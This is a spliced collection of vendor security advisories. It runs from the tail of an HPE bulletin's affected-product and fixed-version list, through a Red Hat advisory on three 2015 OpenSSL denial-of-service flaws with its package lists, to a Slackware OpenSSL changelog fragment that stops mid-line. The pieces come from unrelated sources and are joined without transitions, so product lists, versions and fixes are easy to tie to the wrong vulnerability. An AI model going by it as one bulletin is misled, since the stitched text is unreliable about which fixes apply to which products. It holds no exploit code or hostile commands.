HP 6127XLG Blade Switch Opt Kit\n      - 787635-B22 HP 6127XLG Blade Switch with TAA\n  + **Moonshot - Version: R2432P01**\n    * HP Network Products\n      - 786617-B21 - HP Moonshot-45Gc Switch Module\n      - 704654-B21 - HP Moonshot-45XGc Switch Module\n      - 786619-B21 - HP Moonshot-180XGc Switch Module\n  + **5700 (Comware 7) - Version: R2432P01**\n    * HP Network Products\n      - JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch\n      - JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch\n      - JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch\n      - JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch\n      - JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch\n      - JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch\n  + **5930 (Comware 7) - Version: R2432P01**\n    * HP Network Products\n      - JG726A HP FlexFabric 5930 32QSFP+ Switch\n      - JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch\n      - JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch\n      - JH179A HP FlexFabric 5930 4-slot Switch\n      - JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch\n      - JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch\n  + **HSR6600 (Comware 7) - Version: R7103P09**\n    * HP Network Products\n      - JG353A HP HSR6602-G Router\n      - JG354A HP HSR6602-XG Router\n      - JG776A HP HSR6602-G TAA-compliant Router\n      - JG777A HP HSR6602-XG TAA-compliant Router\n  + **HSR6800 (Comware 7) - Version: R7103P09**\n    * HP Network Products\n      - JG361A HP HSR6802 Router Chassis\n      - JG361B HP HSR6802 Router Chassis\n      - JG362A HP HSR6804 Router Chassis\n      - JG362B HP HSR6804 Router Chassis\n      - JG363A HP HSR6808 Router Chassis\n      - JG363B HP HSR6808 Router Chassis\n      - JG364A HP HSR6800 RSE-X2 Router Main Processing Unit\n      - JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing\n      - JH075A HP HSR6800 RSE-X3 Router Main Processing Unit\n  + **1950 (Comware 7) - Version: R3113P02**\n    * HP Network Products\n      - JG960A HP 1950-24G-4XG Switch\n      - JG961A HP 1950-48G-2SFP+-2XGT Switch\n      - JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch\n      - JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch\n  + **7500 (Comware 7) - Version: R7180**\n    * HP Network Products\n      - JD238C HP 7510 Switch Chassis\n      - JD239C HP 7506 Switch Chassis\n      - JD240C HP 7503 Switch Chassis\n      - JD242C HP 7502 Switch Chassis\n      - JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only\nMain Processing Unit\n      - JH208A HP 7502 Main Processing Unit\n      - JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port\n40GbE QSFP+ Main Processing Unit\n  + **5510HI (Comware 7) - Version: R1120**\n    * HP Network Products\n      - JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch\n      - JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch\n      - JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch\n      - JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch\n      - JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch\n  + **5130HI (Comware 7) - Version: R1120**\n    * HP Network Products\n      - JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch\n      - JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch\n      - JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch\n      - JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch\n\n\n**iMC Products**\n\n  + **IMC PLAT - Version: 7.2 E0403P04**\n    * HP Network Products\n      - JD125A  HP IMC Std S/W Platform w/100-node\n      - JD126A  HP IMC Ent S/W Platform w/100-node\n      - JD808A  HP IMC Ent Platform w/100-node License\n      - JD814A   HP A-IMC Enterprise Edition Software DVD Media\n      - JD815A  HP IMC Std Platform w/100-node License\n      - JD816A  HP A-IMC Standard Edition Software DVD Media\n      - JF288AAE  HP Network Director to Intelligent Management Center\nUpgrade E-LTU\n      - JF289AAE  HP Enterprise Management System to Intelligent Management\nCenter Upgrade E-LTU\n      - JF377A  HP IMC Std S/W Platform w/100-node Lic\n      - JF377AAE  HP IMC Std S/W Pltfrm w/100-node E-LTU\n      - JF378A  HP IMC Ent S/W Platform w/200-node Lic\n      - JF378AAE  HP IMC Ent S/W Pltfrm w/200-node E-LTU\n      - JG546AAE  HP IMC Basic SW Platform w/50-node E-LTU\n      - JG548AAE  HP PCM+ to IMC Bsc Upgr w/50-node E-LTU\n      - JG549AAE  HP PCM+ to IMC Std Upgr w/200-node E-LTU\n      - JG747AAE  HP IMC Std SW Plat w/ 50 Nodes E-LTU\n      - JG748AAE  HP IMC Ent SW Plat w/ 50 Nodes E-LTU\n      - JG768AAE  HP PCM+ to IMC Std Upg w/ 200-node E-LTU\n  + **IMC iNode - Version: 7.2 E0407**\n    * HP Network Products\n      - JD144A HP A-IMC User Access Management Software Module with 200-user\nLicense\n      - JD147A HP IMC Endpoint Admission Defense Software Module with\n200-user License\n      - JD435A HP A-IMC Endpoint Admission Defense Client Software\n      - JF388A HP IMC User Authentication Management Software Module with\n200-user License\n      - JF388AAE HP IMC User Authentication Management Software Module with\n200-user E-LTU\n      - JF391A HP IMC Endpoint Admission Defense Software Module with\n200-user License\n      - JF391AAE HP IMC Endpoint Admission Defense Software Module with\n200-user E-LTU\n      - JG752AAE HP IMC User Access Manager Software Module with 50-user\nE-LTU\n      - JG754AAE) HP IMC Endpoint Admission Defense Software Module with\n50-user E-LTU\n  + **iMC UAM_TAM - Version: 7.1 E0406**\n    * HP Network Products\n      - JF388A HP IMC UAM S/W MODULE W/200-USER LICENSE\n      - JF388AAE HP IMC UAM S/W MODULE W/200-USER E-LTU\n      - JG752AAE HP IMC UAM SW MOD W/ 50-USER E-LTU\n      - JG483A HP IMC TAM S/W MODULE W/100-NODE LIC\n      - JG483AAE HP IMC TAM S/W MODULE W/100-NODE E-LTU\n      - JG764AAE HP IMC TAM SW MOD W/ 50-NODE E-LTU\n  + **IMC WSM - Version: 7.2 E0502P04**\n    * HP Network Products\n      - JD456A HP IMC WSM Software Module with 50-Access Point License\n      - JF414A HP IMC Wireless Service Manager Software Module with 50-Access\nPoint License\n      - JF414AAE HP IMC Wireless Service Manager Software Module with\n50-Access Point E-LTU\n      - JG551AAE HP PCM+ Mobility Manager to IMC Wireless Service Manager\nModule Upgrade with 250 Access Point E-LTU\n      - JG758AAE HP IMC WSM/RTLS w/ 50-node E-LTU\n      - JG769AAE HP PCM Mobility Manager to IMC Wireless Service Manager Upg\nwith 250-node E-LTU\n\n**VCX Products**\n\n  + **VCX - Version: 9.8.19**\n    * HP Network Products\n      - J9672A HP VCX V7205 Platform w/ DL360 G7 Srvr\n      - J9668A HP VCX IPC V7005 Pltfrm w/ DL120 G6 Srvr\n      - JC517A HP VCX V7205 Platform w/DL 360 G6 Server\n      -  JE355A HP VCX V6000 Branch Platform 9.0\n      - JC516A HP VCX V7005 Platform w/DL 120 G6 Server\n      - JC518A HP VCX Connect 200 Primry 120 G6 Server\n      - J9669A HP VCX IPC V7310 Pltfrm w/ DL360 G7 Srvr\n      - JE341A HP VCX Connect 100 Secondary\n      - JE252A HP VCX Connect Primary MIM Module\n      - JE253A HP VCX Connect Secondary MIM Module\n      - JE254A HP VCX Branch MIM Module\n      - JE355A HP VCX V6000 Branch Platform 9.0\n      - JD028A HP MS30-40 RTR w/VCX + T1/FXO/FXS/Mod\n      - JD023A HP MSR30-40 Router with VCX MIM Module\n      - JD024A HP MSR30-16 RTR w/VCX Ent Br Com MIM\n      - JD025A HP MSR30-16 RTR w/VCX + 4FXO/2FXS Mod\n      - JD026A HP MSR30-16 RTR w/VCX + 8FXO/4FXS Mod\n      - JD027A HP MSR30-16 RTR w/VCX + 8BRI/4FXS Mod\n      - JD029A HP MSR30-16 RTR w/VCX + E1/4BRI/4FXS\n      - JE340A HP VCX Connect 100 Pri Server 9.0\n      - JE342A HP VCX Connect 100 Sec Server 9.0\n\n**Note:** Please contact HPE Technical Support if any assistance is needed\nacquiring the software updates. \n\nHISTORY\nVersion:1 (rev.1) - 21 February 2017 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n  Web form: https://www.hpe.com/info/report-security-vulnerability\n  Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Moderate: openssl security update\nAdvisory ID:       RHSA-2015:2617-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2015-2617.html\nIssue date:        2015-12-14\nCVE Names:         CVE-2015-3194 CVE-2015-3195 CVE-2015-3196 \n=====================================================================\n\n1. Summary:\n\nUpdated openssl packages that fix three security issues are now available\nfor Red Hat Enterprise Linux 6 and 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library. \n\nA NULL pointer derefernce flaw was found in the way OpenSSL verified\nsignatures using the RSA PSS algorithm. A remote attacked could possibly\nuse this flaw to crash a TLS/SSL client using OpenSSL, or a TLS/SSL server\nusing OpenSSL if it enabled client authentication. (CVE-2015-3194)\n\nA memory leak vulnerability was found in the way OpenSSL parsed PKCS#7 and\nCMS data. A remote attacker could use this flaw to cause an application\nthat parses PKCS#7 or CMS data from untrusted sources to use an excessive\namount of memory and possibly crash. (CVE-2015-3195)\n\nA race condition flaw, leading to a double free, was found in the way\nOpenSSL handled pre-shared key (PSK) identify hints. A remote attacker\ncould use this flaw to crash a multi-threaded SSL/TLS client using\nOpenSSL. (CVE-2015-3196)\n\nAll openssl users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. For the update to take\neffect, all services linked to the OpenSSL library must be restarted, or\nthe system rebooted. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1288320 - CVE-2015-3194 OpenSSL: Certificate verify crash with missing PSS parameter\n1288322 - CVE-2015-3195 OpenSSL: X509_ATTRIBUTE memory leak\n1288326 - CVE-2015-3196 OpenSSL: Race condition handling PSK identify hint\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl-1.0.1e-42.el6_7.1.src.rpm\n\ni386:\nopenssl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-perl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-static-1.0.1e-42.el6_7.1.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-perl-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-static-1.0.1e-42.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl-1.0.1e-42.el6_7.1.src.rpm\n\nx86_64:\nopenssl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-perl-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-static-1.0.1e-42.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl-1.0.1e-42.el6_7.1.src.rpm\n\ni386:\nopenssl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.i686.rpm\n\nppc64:\nopenssl-1.0.1e-42.el6_7.1.ppc.rpm\nopenssl-1.0.1e-42.el6_7.1.ppc64.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.ppc.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.ppc64.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.ppc.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-42.el6_7.1.s390.rpm\nopenssl-1.0.1e-42.el6_7.1.s390x.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.s390.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.s390x.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.s390.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-perl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-static-1.0.1e-42.el6_7.1.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-42.el6_7.1.ppc64.rpm\nopenssl-perl-1.0.1e-42.el6_7.1.ppc64.rpm\nopenssl-static-1.0.1e-42.el6_7.1.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-42.el6_7.1.s390x.rpm\nopenssl-perl-1.0.1e-42.el6_7.1.s390x.rpm\nopenssl-static-1.0.1e-42.el6_7.1.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-perl-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-static-1.0.1e-42.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl-1.0.1e-42.el6_7.1.src.rpm\n\ni386:\nopenssl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-devel-1.0.1e-42.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-perl-1.0.1e-42.el6_7.1.i686.rpm\nopenssl-static-1.0.1e-42.el6_7.1.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-perl-1.0.1e-42.el6_7.1.x86_64.rpm\nopenssl-static-1.0.1e-42.el6_7.1.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.1.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.1.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.1.src.rpm\n\naarch64:\nopenssl-1.0.1e-51.el7_2.1.aarch64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.aarch64.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.aarch64.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.aarch64.rpm\n\nppc64:\nopenssl-1.0.1e-51.el7_2.1.ppc64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.ppc64.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.ppc.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.ppc64.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.ppc.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.ppc64.rpm\n\nppc64le:\nopenssl-1.0.1e-51.el7_2.1.ppc64le.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.ppc64le.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.ppc64le.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.ppc64le.rpm\n\ns390x:\nopenssl-1.0.1e-51.el7_2.1.s390x.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.s390x.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.s390.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.s390x.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.s390.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\naarch64:\nopenssl-debuginfo-1.0.1e-51.el7_2.1.aarch64.rpm\nopenssl-perl-1.0.1e-51.el7_2.1.aarch64.rpm\nopenssl-static-1.0.1e-51.el7_2.1.aarch64.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-51.el7_2.1.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.ppc64.rpm\nopenssl-perl-1.0.1e-51.el7_2.1.ppc64.rpm\nopenssl-static-1.0.1e-51.el7_2.1.ppc.rpm\nopenssl-static-1.0.1e-51.el7_2.1.ppc64.rpm\n\nppc64le:\nopenssl-debuginfo-1.0.1e-51.el7_2.1.ppc64le.rpm\nopenssl-perl-1.0.1e-51.el7_2.1.ppc64le.rpm\nopenssl-static-1.0.1e-51.el7_2.1.ppc64le.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-51.el7_2.1.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.s390x.rpm\nopenssl-perl-1.0.1e-51.el7_2.1.s390x.rpm\nopenssl-static-1.0.1e-51.el7_2.1.s390.rpm\nopenssl-static-1.0.1e-51.el7_2.1.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.1.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.1.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.1.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.1.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.1.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-3194\nhttps://access.redhat.com/security/cve/CVE-2015-3195\nhttps://access.redhat.com/security/cve/CVE-2015-3196\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://openssl.org/news/secadv/20151203.txt\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFWblodXlSAg2UNWIIRAt6yAKCw1yHbcUPDEPeokS22dMKyo6YFsQCgmPe4\ndpIS/iR9oiOKMXJY5t447ME=\n=qvLr\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/openssl-1.0.1q-x86_64-1_slack14.1.txz:  Upgraded. \n  Anon DH ServerKeyExchange with 0 p parameter (CVE-2015-1794). \n  For more information, see:\n    https://openssl.org/news/secadv_20151203.txt\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1794\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3193\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3194\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3195\n    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3196\n  (* Security fix *)\npatches/packages/openssl-solibs-1.0.1q-x86_64-1_slack14.1.txz:  Upgraded. \n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project!  :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated packages for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-0.9.8zh-i486-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/openssl-solibs-0.9.8zh-i486-1_slack13.0.txz\n\nUpdated packages for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-0.9.8zh-x86_64-1_slack13.0.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/openssl-solibs-0.9.8zh-x86_64-1_slack13.0.txz\n\nUpdated packages for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-0.9.8zh-i486-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/openssl-solibs-0.9.8zh-i486-1_slack13.1.txz\n\nUpdated packages for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-0.9.8zh-x86_64-1_slack13.1.txz\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/openssl-solibs-0.9.8zh-x86_64-1_slack13.1.txz\n\nUpdated packages for Slackware 